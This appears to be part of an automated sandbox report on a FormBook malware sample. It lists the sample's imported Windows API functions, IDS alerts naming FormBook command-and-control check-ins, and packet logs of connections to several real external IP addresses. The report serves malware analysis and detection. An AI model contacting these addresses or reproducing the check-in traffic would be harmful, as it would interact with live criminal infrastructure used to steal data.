                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-10-08T16:34:09.577337+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736148.72.152.17480TCP
                                                                        2024-10-08T16:34:09.577337+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736148.72.152.17480TCP
                                                                        2024-10-08T16:34:25.149111+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498073.33.130.19080TCP
                                                                        2024-10-08T16:34:27.700097+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498203.33.130.19080TCP
                                                                        2024-10-08T16:34:30.224719+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498383.33.130.19080TCP
                                                                        2024-10-08T16:34:32.773056+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4498543.33.130.19080TCP
                                                                        2024-10-08T16:34:32.773056+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498543.33.130.19080TCP
                                                                        2024-10-08T16:34:38.867603+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449884172.191.244.6280TCP
                                                                        2024-10-08T16:34:41.458048+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449898172.191.244.6280TCP
                                                                        2024-10-08T16:34:44.172027+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449915172.191.244.6280TCP
                                                                        2024-10-08T16:34:46.735729+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449929172.191.244.6280TCP
                                                                        2024-10-08T16:34:46.735729+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449929172.191.244.6280TCP
                                                                        2024-10-08T16:34:53.052676+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449965172.96.191.3980TCP
                                                                        2024-10-08T16:34:55.405586+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449979172.96.191.3980TCP
                                                                        2024-10-08T16:34:58.160208+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449990172.96.191.3980TCP
                                                                        2024-10-08T16:35:00.539585+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450009172.96.191.3980TCP
                                                                        2024-10-08T16:35:00.539585+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450009172.96.191.3980TCP
                                                                        2024-10-08T16:35:06.383956+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017217.70.184.5080TCP
                                                                        2024-10-08T16:35:09.393252+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018217.70.184.5080TCP
                                                                        2024-10-08T16:35:13.005498+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019217.70.184.5080TCP
                                                                        2024-10-08T16:35:14.675773+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450020217.70.184.5080TCP
                                                                        2024-10-08T16:35:14.675773+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450020217.70.184.5080TCP
                                                                        2024-10-08T16:35:21.787157+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002163.250.47.4080TCP
                                                                        2024-10-08T16:35:24.221471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002263.250.47.4080TCP
                                                                        2024-10-08T16:35:26.921304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002363.250.47.4080TCP
                                                                        2024-10-08T16:35:29.400431+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002463.250.47.4080TCP
                                                                        2024-10-08T16:35:29.400431+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002463.250.47.4080TCP
                                                                        2024-10-08T16:35:35.132418+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002591.184.0.20080TCP
                                                                        2024-10-08T16:35:37.638029+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002691.184.0.20080TCP
                                                                        2024-10-08T16:35:40.497999+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002791.184.0.20080TCP
                                                                        2024-10-08T16:35:42.903755+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002891.184.0.20080TCP
                                                                        2024-10-08T16:35:42.903755+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002891.184.0.20080TCP
                                                                        2024-10-08T16:35:48.432482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002913.248.169.4880TCP
                                                                        2024-10-08T16:35:50.957525+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003013.248.169.4880TCP
                                                                        2024-10-08T16:35:53.691644+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003113.248.169.4880TCP
                                                                        2024-10-08T16:35:56.288842+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003213.248.169.4880TCP
                                                                        2024-10-08T16:35:56.288842+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003213.248.169.4880TCP
                                                                        2024-10-08T16:36:16.506159+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003743.242.202.16980TCP
                                                                        2024-10-08T16:36:19.055163+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003843.242.202.16980TCP
                                                                        2024-10-08T16:36:21.606190+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003943.242.202.16980TCP
                                                                        2024-10-08T16:36:24.175518+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004043.242.202.16980TCP
                                                                        2024-10-08T16:36:24.175518+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004043.242.202.16980TCP
                                                                        2024-10-08T16:36:30.319022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041103.224.182.24280TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 8, 2024 16:34:09.063029051 CEST4973680192.168.2.4148.72.152.174
                                                                        Oct 8, 2024 16:34:09.067946911 CEST8049736148.72.152.174192.168.2.4
                                                                        Oct 8, 2024 16:34:09.068031073 CEST4973680192.168.2.4148.72.152.174
                                                                        Oct 8, 2024 16:34:09.075884104 CEST4973680192.168.2.4148.72.152.174
                                                                        Oct 8, 2024 16:34:09.080781937 CEST8049736148.72.152.174192.168.2.4
                                                                        Oct 8, 2024 16:34:09.576822042 CEST8049736148.72.152.174192.168.2.4
                                                                        Oct 8, 2024 16:34:09.577236891 CEST8049736148.72.152.174192.168.2.4
                                                                        Oct 8, 2024 16:34:09.577337027 CEST4973680192.168.2.4148.72.152.174
                                                                        Oct 8, 2024 16:34:09.580452919 CEST4973680192.168.2.4148.72.152.174
                                                                        Oct 8, 2024 16:34:09.585370064 CEST8049736148.72.152.174192.168.2.4
                                                                        Oct 8, 2024 16:34:24.660065889 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:24.665002108 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:24.665076017 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:24.676636934 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:24.681587934 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:25.149024010 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:25.149111032 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:26.192877054 CEST4980780192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:26.197813988 CEST80498073.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.211678028 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.216702938 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.216767073 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.228100061 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:27.233050108 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.699974060 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:27.700097084 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:28.739753962 CEST4982080192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:28.744945049 CEST80498203.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.758759022 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.763880014 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.763995886 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.774672031 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:29.779748917 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779768944 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779786110 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779863119 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779876947 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779891014 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779913902 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779926062 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:29.779953957 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:30.224636078 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:30.224719048 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:31.287240982 CEST4983880192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:31.292191982 CEST80498383.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.305491924 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.310749054 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.310869932 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.318255901 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.325514078 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.772227049 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.772968054 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:32.773056030 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.780472994 CEST4985480192.168.2.43.33.130.190
                                                                        Oct 8, 2024 16:34:32.785564899 CEST80498543.33.130.190192.168.2.4
                                                                        Oct 8, 2024 16:34:38.403012037 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.407989025 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.408092976 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.419114113 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:38.424256086 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867480040 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867502928 CEST8049884172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:38.867603064 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:39.938807011 CEST4988480192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.946279049 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.951642036 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:40.951719046 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.963867903 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:40.969177008 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.457806110 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.457828999 CEST8049898172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:41.458048105 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:42.487567902 CEST4989880192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.493277073 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.696053028 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.696171999 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.707895994 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:43.713068008 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713099003 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713218927 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713246107 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713272095 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713298082 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713344097 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713371038 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:43.713402987 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.171924114 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.171955109 CEST8049915172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:44.172027111 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:45.224143982 CEST4991580192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.243208885 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.248229027 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.248337984 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.256012917 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.260890961 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735551119 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735637903 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:46.735728979 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.738580942 CEST4992980192.168.2.4172.191.244.62
                                                                        Oct 8, 2024 16:34:46.744456053 CEST8049929172.191.244.62192.168.2.4
                                                                        Oct 8, 2024 16:34:51.902340889 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.907360077 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:51.907814026 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.919229031 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:51.925033092 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.051943064 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052614927 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052628994 CEST8049965172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:53.052675962 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:53.052757025 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:53.427376986 CEST4996580192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.453739882 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.459564924 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:54.461858034 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.475677967 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:54.480849028 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.389796972 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.405531883 CEST8049979172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:55.405586004 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:55.991724014 CEST4997980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.012412071 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.017330885 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.017407894 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.036194086 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:57.041307926 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041384935 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041822910 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.041956902 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042023897 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042032957 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042329073 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042382956 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:57.042392015 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160095930 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160150051 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160178900 CEST8049990172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:58.160207987 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:58.160290956 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:58.552459002 CEST4999080192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.596548080 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.602224112 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:34:59.602299929 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.613439083 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:34:59.618714094 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539025068 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539438963 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:00.539585114 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:35:00.543736935 CEST5000980192.168.2.4172.96.191.39
                                                                        Oct 8, 2024 16:35:00.548687935 CEST8050009172.96.191.39192.168.2.4
                                                                        Oct 8, 2024 16:35:05.723603010 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.728717089 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:05.728786945 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.742425919 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:05.747684002 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383351088 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383539915 CEST8050017217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:06.383955956 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:07.255481958 CEST5001780192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.275099039 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.789329052 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:08.791902065 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.803767920 CEST5001880192.168.2.4217.70.184.50
                                                                        Oct 8, 2024 16:35:08.808928967 CEST8050018217.70.184.50192.168.2.4
                                                                        Oct 8, 2024 16:35:09.392776966 CEST8050018217.70.184.50192.168.2.4
